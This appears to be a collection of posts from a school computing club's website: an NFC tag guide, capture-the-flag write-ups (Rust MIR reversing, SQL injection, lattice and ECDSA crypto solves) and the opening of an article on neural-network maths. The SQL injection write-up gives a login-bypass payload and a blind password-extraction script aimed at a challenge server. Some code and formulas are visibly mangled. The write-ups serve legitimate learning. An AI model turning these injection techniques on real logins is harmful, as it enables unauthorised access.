*by AppVenture, NUSH's Computer Science Interest Group*

Welcome to NUS High! We are AppVenture, NUSH's Computer Science Interest Group. Come down to our booth during IG Fair to learn more about us, and follow us on Instagram at **@appventure_nush** for interesting posts about computer science!

Or: browse this current website you are on, nush.app, which is made and maintained by our members!

Near Field Communication (NFC) technology allows wireless communication between two electronic devices close to each other, at a distance of up to 1.5 inches (3.81 cm).

The most common example is communication between a device like a smartphone (active - has a power source) and a readable NFC tag (passive - no power source). This communication is possible because the reading device, often your smartphone, can generate a radio frequency (RF) field to power the tag. In Singapore, you can use your phone's NFC capabilities to pay for transit fares at the EZ-Link readers!

The NFC tag you're holding has many applications! Do your best to use this NFC tag in fun and interesting ways :)

Here's some example applications (we encourage you to come up with more!):

- Directing people to websites (like in this case), or launching applications
- Contactless payments, similar to Google Pay and Apple Pay
- Automating tasks, like connecting to Wi-Fi or Bluetooth networks, unlocking smart locks, authenticating (2FA) with security key, or triggering shortcuts/automation on your phone (eg. iOS Shortcuts, for Android you can use other 3rd party apps)
- Creative purposes, like sharing media content, or creating digital business cards
- Other cool stuff like setting focus modes, silencing your phone, controlling smart home accessories, playing your favorite music, or setting timers

The NFC tag you've been given is a rewritable NFC tag: As long as you have an NFC tag writer application on your phone and NFC support on your phone, you can program it! Hence, you can reuse it for as many applications as you would like.

**You may need to go to your phone settings to enable NFC.** If there is no NFC support in your settings and you can't get the tag to work, your phone may not support NFC: phones ≥ Android 10/iOS 13 should be supported (which is most phones made in the last 6 years).

To read/write the NFC tag, put the NFC tag on the back of your phone, near the camera area. If it doesn't work, try taking off your phone case or moving the NFC tag all over the back of your phone.

Download the app "*NFC TagWriter by NXP*". There are other NFC tag apps you can install that will work (and any will work), but this is among the most popular ones.

**The app has the below functions:**

*Read tags*– reads the content of the tag. Useful to check what information an unknown tag stores, and see if it's malicious or not– what we want to do. Writes new instructions/information to the tag.*Write tags**Erase tags*– erases the contents of a tag*Protect tags*– sets a password on your tag to prevent anyone from just overwriting it, hence "protecting" it.

**Warning**: once you "lock" your tag (not "protect"), nobody (not even you) can write it again, and it will be read-only, so **do not lock your tag** unless you are very sure that you never want to edit it again!

If you're a fan of long PDFs, you can also refer to the official documentation here, for more advanced functionalities. If there's any feature you don't understand, we encourage you to search it online and find out for yourself!

Open TagWriter, and you should see the below screen.

"Dataset" refers to the instructions you want to give your NFC tag. The app automatically saves prior instructions in "My datasets".

- Press "Write tags", then press "New dataset" to start writing to your NFC tag.
- Choose what to write from a variety of options, and enjoy!

If you have any queries or still can't get it to work, you can DM **@appventure_nush** on Instagram or email us at appventure@nushigh.edu.sg, or come to our booth during IG Fair! Tag us on Instagram to showcase your creative applications, or tell us during IG Fair :)

We hope you will explore more about NFC tags and use this NFC tag creatively. After all, experiment, explore, excel!

Signing off,

AppVenture Exco 2024

{.left-align width=50}

*The tags are here if you want more product information.*

Tags: rev

we are given a challenge.mir. Apparently `mir`

(*mid-level* intermediate reprsentation) is a transient file that the rust compiler uses. It consists of many, many functions (`func001`

, `func002`

, `func003`

, etc...), and a main function.

We decided to do the stupid thing and manually reverse it by hand, painstakingly.

Let's dig into the main function first:
It first defines like 120 variables, but we can worry about that later. the nested `scope{ }`

are also all useless.

We see a lot of `bb0`

, `bb1`

, etc, those are *basic blocks* inside the `.mir`

file. They represent a sequence of instructions or statements, and determine how the program flows. Let's start with `bb0`

in `main`

:

```
bb0: {
_1 = func001(const 126_u8) -> bb1;
}
```

where `func001`

is:

```
fn func001(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _2: u8;
let mut _3: (u8, bool);
let mut _4: u8;
let mut _5: u8;
let mut _6: (u8, bool);
let mut _7: (u8, bool);
scope 1 {
debug retn => _0;
}
bb0: {
_0 = _1;
_2 = _0;
_3 = CheckedShr(_2, const 3_i32); // rshift _3 by 3
assert(!move (_3.1: bool), "attempt to shift right by `{}`, which would overflow", const 3_i32) -> bb1;
}
bb1: {
_0 = move (_3.0: u8);
_5 = _0;
_6 = CheckedMul(_5, const 4_u8); // multiply _5 by 4
assert(!move (_6.1: bool), "attempt to compute `{} * {}`, which would overflow", move _5, const 4_u8) -> bb2;
}
bb2: {
_4 = move (_6.0: u8);
_7 = CheckedAdd(_4, const 7_u8); // add 7 to _4
assert(!move (_7.1: bool), "attempt to compute `{} + {}`, which would overflow", move _4, const 7_u8) -> bb3;
}
bb3: {
_0 = move (_7.0: u8);
return;
}
}
```

Which is basically:

```
bb0: {
_1 = (126 >> 3) * 4 + 7 -> bb1; // 67
}
```

Now let's see `bb1`

:

```
bb1: {
_3 = _1;
_2 = move _3 as char (IntToInt);
_4 = func002(const 51_u8) -> bb2;
}
```

We see it makes a a char labelled `_2`

, which I assume is the characters of the flag. It also tries to feed `bb2`

, the next block, with `func002(51)`

, which will later become another character in the flag. From now on we just focused on evaluating these `funcxxx()`

and its output.

The next several functions are all elementary ones, comprising of addition, subtraction, multiplication, division, and bitwise operators.

The next different one is `func010`

:

```
fn func010(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _2: std::ops::Range<i32>;
let mut _3: std::ops::Range<i32>;
let mut _5: std::option::Option<i32>;
let mut _6: &mut std::ops::Range<i32>;
let mut _7: isize;
let mut _8: (u8, bool);
scope 1 {
debug retn => _0;
let mut _4: std::ops::Range<i32>;
scope 2 {
debug iter => _4;
}
}
bb0: {
_0 = _1;
_3 = std::ops::Range::<i32> { start: const 0_i32, end: const 10_i32 }; // loop of count 10
_2 = <std::ops::Range<i32> as IntoIterator>::into_iter(move _3) -> bb1;
}
bb1: {
_4 = move _2;
goto -> bb2;
}
bb2: {
_6 = &mut _4;
_5 = <std::ops::Range<i32> as Iterator>::next(_6) -> bb3;
}
bb3: {
_7 = discriminant(_5);
switchInt(move _7) -> [0: bb6, 1: bb4, otherwise: bb5];
}
bb4: {
_8 = CheckedAdd(_0, const 1_u8); // add one
assert(!move (_8.1: bool), "attempt to compute `{} + {}`, which would overflow", _0, const 1_u8) -> bb7;
}
bb5: {
unreachable;
}
bb6: {
return;
}
bb7: {
_0 = move (_8.0: u8);
goto -> bb2;
}
}
```

It is essentially a for loop of 10, and each time it loops `_0`

gets incremented by 1 (via `_8`

)
Therefore `func010(109) = 119`

which corresponds to `'w'`

The next several functions are also elementary ones, comprising of addition, subtraction, multiplication, division, and bitwise operators, and also exponentiation.

The next different one is `func018`

:

```
fn func018(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _3: u8;
let mut _4: usize;
let mut _5: u8;
let mut _6: (u8, bool);
scope 1 {
debug retn => _0;
let _2: &str;
scope 2 {
debug s => _2;
}
}
bb0: {
_0 = _1;
_2 = const "fightingkeepgoing";
_4 = core::str::<impl str>::len(_2) -> bb1; // gets string length (17)
}
bb1: {
_3 = move _4 as u8 (IntToInt);
_5 = _0;
_6 = CheckedAdd(_3, _5); // input + 17
assert(!move (_6.1: bool), "attempt to compute `{} + {}`, which would overflow", move _3, move _5) -> bb2;
}
bb2: {
_0 = move (_6.0: u8);
return;
}
}
```

It creates a string `"fightingkeepgoing"`

, gets the length of the string (17) and adds it to the input.
Hence `func018(50) = 67`

which as a char is `'C'`

.

`func020`

is almost the same as `func010`

except it increments by 3 each time instead of 1, therefore `func020(54) = 84`

which is `'T'`

.

The next different function is `func030`

:

```
fn func030(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _3: (i32, bool);
let mut _4: (u8, bool);
let mut _5: i32;
scope 1 {
debug retn => _0;
let mut _2: i32;
scope 2 {
debug chk => _2;
}
}
bb0: {
_0 = _1;
_2 = const 0_i32;
goto -> bb1;
}
bb1: {
_3 = CheckedAdd(_2, const 1_i32);
assert(!move (_3.1: bool), "attempt to compute `{} + {}`, which would overflow", _2, const 1_i32) -> bb2;
}
bb2: {
_2 = move (_3.0: i32);
_4 = CheckedAdd(_0, const 1_u8);
assert(!move (_4.1: bool), "attempt to compute `{} + {}`, which would overflow", _0, const 1_u8) -> bb3;
}
bb3: {
_0 = move (_4.0: u8);
_5 = _2;
switchInt(move _5) -> [8: bb4, otherwise: bb1];
}
bb4: {
return;
}
}
```

`_2`

is initialized at 0.
`bb1`

and `bb2`

increments `_2`

and `_0`

by 2 each time, and `bb3`

checks if `_2`

is 8. So the end result is the input incremented by 8. Therefore `func030(100) = 108`

which is `'1'`

The last weird function is `func033`

;

```
fn func033(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _2: std::ops::Range<i32>;
let mut _3: std::ops::Range<i32>;
let mut _5: std::option::Option<i32>;
let mut _6: &mut std::ops::Range<i32>;
let mut _7: isize;
let mut _9: i32;
let mut _10: (u8, bool);
scope 1 {
debug retn => _0;
let mut _4: std::ops::Range<i32>;
scope 2 {
debug iter => _4;
let _8: i32;
scope 3 {
debug i => _8;
}
}
}
bb0: {
_0 = _1; // 106
_3 = std::ops::Range::<i32> { start: const 0_i32, end: const 10_i32 };
_2 = <std::ops::Range<i32> as IntoIterator>::into_iter(move _3) -> bb1;
}
bb1: {
_4 = move _2;
goto -> bb2;
}
bb2: {
_6 = &mut _4;
_5 = <std::ops::Range<i32> as Iterator>::next(_6) -> bb3;
}
bb3: {
_7 = discriminant(_5);
switchInt(move _7) -> [0: bb6, 1: bb4, otherwise: bb5];
}
bb4: {
_8 = ((_5 as Some).0: i32);
_9 = Rem(_8, const 2_i32);
switchInt(move _9) -> [0: bb7, otherwise: bb2];
}
bb5: {
unreachable;
}
bb6: {
return;
}
bb7: {
_10 = CheckedAdd(_0, const 1_u8);
assert(!move (_10.1: bool), "attempt to compute `{} + {}`, which would overflow", _0, const 1_u8) -> bb8;
}
bb8: {
_0 = move (_10.0: u8);
goto -> bb2;
}
}
```

This can be re-written as:

```
func033(input){
for (let i = 0;i < 10;i++){
if(i%2 == 0){
input += 1
}
}
}
```

Therefore `func033(106) = 111`

which is `'o'`

Final flag: `CDDC2023{w0w_YOU_CuT_cR4b_Be1ly_oP3N}`

Tags: web

Login with the admin ! http://52.78.16.36:8881/web1/index.php

So we are given a username and password field. I tried username `admin`

and password `' or 1=1;#`

and it worked - it just said "Hello admin" - so it is vulnerable to SQL Injection

I assumed that the query was something like this:

```
SELECT <thing> FROM <thetable> WHERE id = '{id}' AND pw = '{pw}';
```

We see that the url is `http://52.78.16.36:8881/web1/?id=admin&pw=password`

, so the column name is probably `pw`

, so we can inject:

```
' or 1=1 or pw LIKE '%';#
```

We then replace the `%`

with increasingly many `_`

until we find one that matches - oh wait it says "no hack", so that probably does not work. Whatever since `%`

is not filtered lets use that to get the password:

```
import requests
base = "http://52.78.16.36:8881/web1/"
arr = []
id = 40
print(f"base url: {base}")
while True:
char = chr(id)
pw = f"' OR pw LIKE '{''.join(arr)}{char}%';#"
params = {'id': 'admin', 'pw': pw}
res = requests.get(base, params=params)
if id == 127:
print("end: "+pw)
break
elif 'Hello admin' in res.text:
arr.append(char)
id = 40
print("Correct: "+pw)
else:
print("Wrong: "+pw)
id += 1
```

the result is `end: ' OR pw LIKE 'ADMIN123PW⌂%';#`

, and ignoring the last few bits we get `ADMIN123PW`

, but that still doesnt give us the flag. Since `LIKE`

is not case-senstive, and we can't using `SUBSTRING`

since I dont know the table name, we can only try for different combinations of upper and lowercase. I tried all lowercase instead (i.e. `admin123pw`

) and I got the flag.

Category: Crypto

Entire Challenge:

```
assert __import__('re').fullmatch(r'SEE{\w{23}}',flag:=input()) and not int.from_bytes(flag.encode(),'big')%13**37
```

The assert statement will return an error if the condition given is not fulfilled otherwise nothing is returned. The first part of the condition is doing a regex match of the form `SEE{\w{23}}`

, thus the flag contains 23 characters in the curly braces. The second part of the condition ensures that the flag is divisible by $13^{37}$ in long form.

I actually tried a lot of things at first like brute force and greedy from right to left, but they didn't even come close

The first realisation comes when I realised that a bytestring `b'abc'`

can be represented as

$2^{16}\cdot$ `b'a'`

$+2^8\cdot$ `b'b'`

$+2^0 \cdot$ `b'c'`

so essentially you are trying to solve for

`b'SEE{...}'`

$ + \sum_{i=1}^{23} 2^{8i} x_I \equiv 0 \pmod{13^{37}}$

where all of $x_i$ satisfies `\w`

By default I would have no idea how to implement this and it kinda looks impossible, but when trying this challenge I remembered hearing a lot of stuff about LLL to solve equations and I wanted to join in on the fun

So understanding LLL was quite the learning curve but essentially what it does is, given a lattice basis

$$ \begin{bmatrix} 1 & 1 & 1\ -1 & 0 & 2\ 3 & 5 & 6 \end{bmatrix} $$

it will find multiple sets of (nonzero?) integers $a, b, c$ such that

$$ a \begin{bmatrix} 1 & 1 & 1 \end{bmatrix} + b \begin{bmatrix} -1 & 0 & 2 \end{bmatrix} + c \begin{bmatrix} 3 & 5 & 6 \end{bmatrix} $$

is as "short" as possible, i.e. minimize the abs of all the values

This is definitely not totally correct but I havent fully figured it out

anyways we can try to get LLL to help us find $x_i$ for us to make the total $\pmod{13^{37}}$ as close as possible to 0.

Usually to minimize $ax_1 + bx_2 + cx_3$ you can use the matrix

$$ \begin{bmatrix} 1 & 0 & 0 & x_1\ 0 & 1 & 0 & x_2\ 0 & 0 & 1 & x_3 \end{bmatrix} $$

which would return some vectors looking like

$$\begin{bmatrix}a & b & c & ax_1 + bx_2 + cx_3 \end{bmatrix}$$

, so similarly, here we can do

$$ \begin{bmatrix} 1 & 0 & 0 & \dots & 0 & 2^{8 \cdot 23} \ 0 & 1 & 0 & \dots & 0 & 2^{8 \cdot 22} \ 0 & 0 & 1 & \dots & 0 & 2^{8 \cdot 21} \ \vdots & \vdots & \vdots & \ddots & \vdots \ 0 & 0 & 0 & \dots & 1 & 2^{8 \cdot 1} \ \end{bmatrix} $$

but since we are taking this $\pmod{13^{37}}$ we simply add another row to automatically reduce any result as such:

$$ \begin{bmatrix} 1 & 0 & 0 & \dots & 0 & 2^{8 \cdot 23} \ 0 & 1 & 0 & \dots & 0 & 2^{8 \cdot 22} \ 0 & 0 & 1 & \dots & 0 & 2^{8 \cdot 21} \ \vdots & \vdots & \vdots & \ddots & \vdots \ 0 & 0 & 0 & \dots & 1 & 2^{8 \cdot 1} \ 0 & 0 & 0 & \dots & 0 & -13^{37} \ \end{bmatrix} $$

but now we have to consider how we initially have the bits of `SEE{}`

which we will use $c$ to represent. we need to add this to the final column, but the problem is, how do we ensure that this vector will be multiplied by 1?

The way I did this is to basically "reward" it by adding $-1$ to the identity part of the matrix so that if it adds this row once those parts will "cancel" out nicely(unsure if needed). I also added another column so that I can check if this was added once

$$ \begin{bmatrix} 1 & 0 & 0 & \dots & 0 & 0 & 2^{8 \cdot 23} \ 0 & 1 & 0 & \dots & 0 & 0 & 2^{8 \cdot 22} \ 0 & 0 & 1 & \dots & 0 & 0 & 2^{8 \cdot 21} \ \vdots & \vdots & \vdots & \ddots & \vdots \ 0 & 0 & 0 & \dots & 1 & 0 & 2^{8 \cdot 1} \ 0 & 0 & 0 & \dots & 0 & 0 & -13^{37} \ -1 & -1 & -1 & \dots & -1 & 1 & c \ \end{bmatrix} $$

This way, if LLL finds a vector ending with $\begin{bmatrix}1&0\end{bmatrix}$, i'll know $c$ was only added once as that column only has a nonzero element in that row, and i'll also know that a valid solution for $x_i$ was found as the final column sums to 0.

But as inspired by the example given on the wikipedia page for LLL, the sum of the final column being 0 matters a LOT, and is actually the only sum we care to minimize (other than keeping the 2nd last column at 1), so what we can do is multiply a weight to this column to make it more important to minimize.

So, after doing testing, the first weights that worked for me was $2^{8*23}$ for the last 2 columns and $1$ for everything else. the implementation(sage):

```
start = (2**(8*24) * bytes_to_long(b"SEE{") + bytes_to_long(b"}"))
W = diagonal_matrix([1]*23 + [2^(8*23), 2^(8*23)])
I = Matrix.identity(23)
right1 = Matrix([0] * 23).T
right2 = Matrix([2^(8*i) for I in range(1, 24)]).T
bottom1 = Matrix([0] * 23 + [0, -13^37])
bottom2 = Matrix([-1] * 23 + [1, start])
L = i.augment(right1).augment(right2).stack(bottom1).stack(bottom2)
sol = (L*W).LLL()/W
for I in sol:
print(i)
```

and we actually get a row ending with $\begin{bmatrix}1&0\end{bmatrix}$, the final row, `(-19, 6, 1, -23, -3, -26, -6, -6, -16, 17, -24, -48, 16, 13, -22, -1, 11, 23, -38, 12, 6, 23, 7, 1, 0)`

.

To get the solution from here we re-add the 1 subtracted in the last row to the first 23 numbers

but anyways this still isnt the solution. quite obviously the values of $x_i$ here go into the negatives which dont make valid characters for the flag. what characters are even valid anyway?

```
good=""
for I in string.printable:
if __import__('re').fullmatch(r'\w', i):
good+=i
```

`0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_`

Yeah this is not a lot to work with but whatever. anyways, to make the values obtained more positive and around these values, I realised that since they are currently kind of distributed around 0, and I have to add 1 to compensate for the last row, what if I just make it so I have to add a lot more?

Essentially, set those values to not -1 but like -90, so that after adding 90 I get nice values. doing this and adding back 90, we get the values

`116, 76, 65, 94, 109, 94, 73, 93, 79, 75, 96, 109, 73, 75, 108, 68, 89, 46, 111, 58, 92, 46, 63`

which are way nicer and almost look correct. but actually, 9 of these numbers are invalid characters

From here, real hell began where I had to keep changing the offsets here and the weights to try to magically get a valid set of values. however, for unexplainable reasons I kept getting rows with 1 bad value (of 140 most of the time). this is probably because the challenge was set to make it so it was barely possible to find a valid string

Anyways after much experimentation, the final code that found the flag for me was

```
found = False
while not found:
offsets = [-93] * 23
W = diagonal_matrix([random.choice([9/10, 1, 11/10]) for _ in range(23)] + [2^(3), 2^(7)])
I = Matrix.identity(23)
right1 = Matrix([0] * 23).T
right2 = Matrix([2^(8*i) for I in range(1, 24)]).T
bottom1 = Matrix([0] * 23 + [0, -13^37])
bottom2 = Matrix(offsets + [1, start])
L = i.augment(right1).augment(right2).stack(bottom1).stack(bottom2)
sols = (L*W).LLL()/W
for row in sols:
if row[-2] == 1 and row[-1]==0:
count = count3(row[:-2], offsets)
if count==0:
print(row[:-2])
print("SEE{" + "".join([chr(row[:-2][x]-offsets[x]) for x in range(len(row[:-2]))])[::-1] + "}")
found=True
else:
print("row:" + str(row))
print("offsets:" + str(offsets))
print("count:" + str(count))
```

giving `SEE{luQ5xmNUKgEEDO_c5LoJCum}`

eventually.

Category: Crypto

They give:

```
import ecdsa # https://pypi.org/project/ecdsa/
import os
flag = os.environ.get('FLAG', 'SEE{not_the_real_flag}').encode()
sk = ecdsa.SigningKey.generate()
for nibble in flag.hex():
signature = sk.sign(flag + nibble.encode())
print(signature.hex())
```

Basically, for every digit in the flag's hex, they append that digit to the flag and then sign it with ecdsa, and print the signature. The thing is,

- Signatures are not meant to encrypt a message
- The fact that they randomly append a digit to the flag every time is highly suspicious

So doing a little bit of testing we can see that

```
flag = b"SEE{"
for nibble in flag.hex():
print(flag + nibble.encode())
"""
b'SEE{5'
b'SEE{3'
b'SEE{4'
b'SEE{5'
b'SEE{4'
b'SEE{5'
b'SEE{7'
b'SEE{b'
"""
```

There are only 16 digits in hex and they get repeated quite often, so we are signing the same message in some cases, but how to use this to our advantage?

ECDSA:

$$r = (kG).x$$

$$s = k^{-1} (h + rd)$$

where k is a random nonce generated, h is the hashed message, and d is the private key

When comparing between two signatures of the same message, we can see that h and d remain the same, while r is known. so, how to deal with k? Seeing that we have $k$ and $k^{-1}$, yeah its quite obvious

$$R * s = kG * k^{-1} (h + rd) = G (h+rd)$$

Now, between two signatures of the same message, the only different variable is r, hence we can expect

$$s_1 - s_2 = G (h+r_1 d) - G(h+r_2 d) = G(r_1-r_2)d$$

You can use this to basically identify each character by comparing it to a signature of that character, and checking whether the difference multiplied by $(r_1-r_2)^{-1}$ is $Gd$, which is the same throughout

first compare to existing characters in SEE{}:

```
p = 0xfffffffffffffffffffffffffffffffeffffffffffffffff
K = GF(p)
a = K(0xfffffffffffffffffffffffffffffffefffffffffffffffc)
b = K(0x64210519e59c80e70fa7e9ab72243049feb8deecc146b9b1)
E = EllipticCurve(K, (a, b))
G = E(0x188da80eb03090f67cbf20eb43a18800f4ff0afd82ff1012, 0x07192b95ffc8da78631011ed6b24cdd573f977a11e794811)
E.set_order(0xffffffffffffffffffffffff99def836146bc9b1b4d22831 * 0x1)
n = E.order()
sigs = []
for i in output.split("\n"):
sigs.append(ecdsa.util.sigdecode_string(bytes.fromhex(i), order = E.order()))
sigs
#5345357b...
r1, s1 = sigs[0]
r2, s2 = sigs[3]
r3, s3 = sigs[2]
r4, s4 = sigs[4]
assert (E.lift_x(ZZ(r1)) * s1 - E.lift_x(ZZ(r2)) * s2) * pow(r1 - r2, -1, n)==(E.lift_x(ZZ(r3)) * s3 - -E.lift_x(ZZ(r4)) * s4) * pow(r3 - r4, -1, n)
Gd = (E.lift_x(ZZ(r1)) * s1 - E.lift_x(ZZ(r2)) * s2) * pow(r1 - r2, -1, n)
flag = list(b"SEE{".hex() + (len(sigs)-10) * "." + b"}".hex())
for i in tqdm([0,1,2,3,4,5,6,7,-2,-1]):
r1, s1 = sigs[i]
for j in range(len(sigs)):
r2, s2 = sigs[j]
a = E.lift_x(ZZ(r1)) * s1
b = E.lift_x(ZZ(r2)) * s2
try:
thes = [(a-b) * pow(r1 - r2, -1, n), (a+b) * pow(r1 - r2, -1, n), (-a-b) * pow(r1 - r2, -1, n), (-a+b) * pow(r1 - r2, -1, n)]
except Exception as e:
continue
if Gd in thes:
flag[j] = flag[i]
```

and we get `5345457b.5..737.5.7..5..737.5....5.d....5.737.75.5.57.7.5.73...7....74757..55..4..7374.....775..73...57.7d`

For remaining digits:

```
for i in tqdm(range(len(flag))):
if flag[i]==".":
r1, s1 = sigs[i]
for j in range(len(sigs)):
r2, s2 = sigs[j]
a = E.lift_x(ZZ(r1)) * s1
b = E.lift_x(ZZ(r2)) * s2
try:
thes = [(a-b) * pow(r1 - r2, -1, n), (a+b) * pow(r1 - r2, -1, n), (-a-b) * pow(r1 - r2, -1, n), (-a+b) * pow(r1 - r2, -1, n)]
except Exception as e:
continue
if Gd in thes:
flag[j] = i**2
flag[i] = i**2
def replace_all(lst, old, new):
return [x if x!=old else new for x in lst]
h = flag
for j in range(7):
h = replace_all(h, remaining[j], "TUVWXYZ"[j])
hh = replace_all(h, "T", "6")
hh = replace_all(hh, "Z", "1")
hh = replace_all(hh, "U", "9")
hh = replace_all(hh, "V", "f")
hh = replace_all(hh, "X", "e")
realflag = ""
for i in range(0, len(hh), 2):
if hh[i] not in "TUVWXYZ" and hh[i+1] not in "TUVWXYZ":
print(hh[i]+hh[i+1] + " " + bytes.fromhex(hh[i]+hh[i+1]).decode())
realflag+=bytes.fromhex(hh[i]+hh[i+1]).decode()
else:
print(hh[i]+hh[i+1])
realflag+="?"
```

which gets `SEE{easy_?easy_?emon_squee?y_signatu?e_distinguis?e?}`

and the remaining digits can be guessed

**Mathematics** is an area of knowledge, which includes the study of such topics as numbers, formulas and related structures, shapes and spaces in which they are contained, and quantities and their changes. There is no general consensus about its exact scope or epistemological status. However, it is extremely labourious and time-consuming but necessary and is sometimes (albeit very rarely) interesting.

Neural Networks are somewhat interesting. Everyone kind of knows the math behind NNs (the gist of it). It was taught in **CS5131** to a very limited extent but not many know about the full math behind deep and convolutional neural networks. I mean people get that it has something to do with backpropogation or whatever, but how do you scale it up to multiple value and multiple derivatives. As you will come to learn, these derivations are incredibly computationally intensive and time-consuming, especially during implementation. But I have done it because I care about AppVenture and I want to help the casual onlooker understand the many trials and tribulations a simple layer goes through to deliver what we should consider peak perfection. It was a fun but painful exercise and I gained a deeper understanding of the mathematical constructs that embody our world. Anyways, let's start out with a referesher. Warning that Matrix Math lurks ahead, so tread with caution. This is deeper than **CS5131** could have ever hoped to cover, so you will learn some stuff with this excercise. This first part is about the math behind deep neural networks.

This article is written with some assumed knowledge of the reader but it is not that bad for most CS students especially since NNs are baby level for the most part. Nonetheless, assumed knowledge is written below.

- Deep Neural Network (How to implement + basic understanding of the math)
- Gradient Descent
- Linear Algebra

If you don't know this stuff, all you really need to do is read an introduction to linear algebra, understand how matrices and vectors are multiplied and watch 3b1b's series on machine learning.

Let's start by importing our bff for life, **Numpy**.

```
>>> import numpy as np
```

Numpy is introduced in CS4132 (or PC6432 for some reason), but for a quick summary, it is a Linear Algebra library, which means it is VERY useful in this task.

Observe the following series of mathematical equations:

$$ \begin{aligned} 4a+2b&=22\ 3a+8b&=49 \end{aligned} $$

Despite the fact that solving these is pretty easy (as we learnt in Year 1), let's try going with a different solution from what is usually portrayed. Let's try using **gradient descent**.

If you remember, Gradient Descent is a method used to solve any sort of equation by taking steps towards the real value by using calculus to predict the direction and size of the step. Essentially if you remember in calculus, the minimum of the graph will have a tangent of slope 0 and hence we can understand the direction of these "steps" to solve the problem. We just need a function where the derivative and function result approach 0 as you get closer to the true solution. This function is known as the objective function.

As you probably know, a linear equation is written as such:

$$ A \mathbf{x}-\mathbf{b}=0 $$

where $A$ is a known square matrix, $\mathbf{b}$ is a known vector and $\mathbf{x}$ is an unknown vector.

In this case, for the objective function we will use Linear Least Squares (LLS) function as it is an accurate thing to minimize in this case written below.

$$ F(\mathbf{x}) = {||A\mathbf{x}-\mathbf{b}||}_{2}^{2} $$

Now, what do the weird lines and two occurences of "2" above mean and how exactly do we calculate the derivative of a scalar in terms of a vector? Well we have to learn matrix calculus, a very peculiar domain of math that is very torturous. Ideally, you want to avoid this at all cost, but I will do a gentle walk through this stuff.

Firstly, let's revise derivatives wth this simple example:

$$ \newcommand{\dv}[2]{\frac{\mathrm{d}{#1}}{\mathrm{d}{#2}}} \newcommand{\ddv}[1]{\frac{\mathrm{d}}{\mathrm{d}{#1}}} \begin{aligned} y&=\sin(x^2)+5\ \dv{y}{x}&=\ddv{x}(\sin(x^2)+5)\ &=2x \cos(x^2) \end{aligned} $$

For functions with multiple variables, we can find the partial derivative with respect to each of the variables, as shown below:

$$ \newcommand{\pv}[2]{\frac{\partial {#1}}{\partial {#2}}} \newcommand{\ppv}[1]{\frac{\partial}{\partial {#1}}} \begin{aligned} f(x,y)&=3xy+x^2\ \ppv{x}(f(x,y))&=3y+2x\ \ppv{y}(f(x,y))&=3x \end{aligned} $$

A thing to understand is that vectors are just a collection of numbers, so an n-sized vector will have n partial derivatives if the function is $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$ (the derivative is known as the gradient). But do we represent these n partial derivatives as a column vector or row vector?

$$
\newcommand{\pv}[2]{\frac{\partial {#1}}{\partial {#2}}}
\newcommand{\ppv}[1]{\frac{\partial}{\partial {#1}}}
\pv{y}{\mathbf{x}} =
\begin{bmatrix}
\pv{y}{\mathbf{x}*{1}}\
\pv{y}{\mathbf{x}*{2}}\
\vdots\
\pv{y}{\mathbf{x}_{n}}\
\end{bmatrix}
$$

$$
\newcommand{\pv}[2]{\frac{\partial {#1}}{\partial {#2}}}
\newcommand{\ppv}[1]{\frac{\partial}{\partial {#1}}}
\pv{y}{\mathbf{x}} =
\begin{bmatrix}
\pv{y}{\mathbf{x}*{1}} & \pv{y}{\mathbf{x}*{2}} & \cdots & \pv{y}{\mathbf{x}_{n}}
\end{bmatrix}
$$

Well, both actually can work (even if you think of a vector as a column vector), the first version is called the denominator layout and the second one is called the numerator layout. They are both transpositions of each other. For gradient descent the denominator layout is more natural because for standard practice because we think of a vector as a column vector. I also prefer the denominator layout. However, the numerator layout follows the rules of single variable calculus more normally and will be much easier to follow. For example, matrices do not have commutative multiplication so the direction you chain terms matters. We naturally think of chaining terms to the back and this is true for numerator layout but in denominator layout terms are chained to the front. Product rule also is more funny when it comes to denom layout. So moving forward we will stick with the numerator layout and transpose the matrix or vector once the derivative is found. We will also stick to column vectors.

First lets look at the $A\mathbf{x}-\mathbf{b}$ term and we will see why the derivative is so and so with a simple $2 \times 2$ case. $A\mathbf{x}-\mathbf{b}$ is a $f:\mathbb{R}^{n} \rightarrow \mathbb{R}^{n}$ and hence the derivative will be a matrix (known as the Jacobian to many). Lets first, see the general equation and work it out for every value.

\begin{bmatrix}
{\mathbf{b}}*{1} \
{\mathbf{b}}*{2}
\end{bmatrix} \
&=
\begin{bmatrix}
{a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1} \
{a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2}
\end{bmatrix}
\end{aligned}
$$

Now we calculate the Jacobian (remember that it is transposed) by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial \mathbf{y}}{\partial \mathbf{x}} &=
\begin{bmatrix}
\frac{\partial {\mathbf{y}}*{1}}{\partial{\mathbf{x}}*{1}} & \frac{\partial {\mathbf{y}}*{1}}{\partial{\mathbf{x}}*{2}}\
\frac{\partial {\mathbf{y}}*{2}}{\partial{\mathbf{x}}*{1}} & \frac{\partial {\mathbf{y}}*{2}}{\partial{\mathbf{x}}*{2}}\
\end{bmatrix} \
\frac{\partial {\mathbf{y}}*{1}}{\partial{\mathbf{x}}*{1}} &= {a}*{11}\
\frac{\partial {\mathbf{y}}*{1}}{\partial{\mathbf{x}}*{2}} &= {a}*{12}\
\frac{\partial {\mathbf{y}}*{2}}{\partial{\mathbf{x}}*{1}} &= {a}*{21}\
\frac{\partial {\mathbf{y}}*{2}}{\partial{\mathbf{x}}*{2}} &= {a}*{22}\
\frac{\partial \mathbf{y}}{\partial \mathbf{x}} &=
\begin{bmatrix}
{a}*{11} & {a}*{12}\
{a}*{21} & {a}*{22}\
\end{bmatrix}
= A
\end{aligned}
$$

We see that it is kind of the same with single variable, where if we have $f(x)=ax$, then $f'(x)=a$ where a is constant.

Now we look at the lines and "2"s. This is a common function known as the euclidean norm or 2-norm.

$$
|{\mathbf {x}}|*{2}:={\sqrt {x*{1}^{2}+\cdots +x_{n}^{2}}}
$$

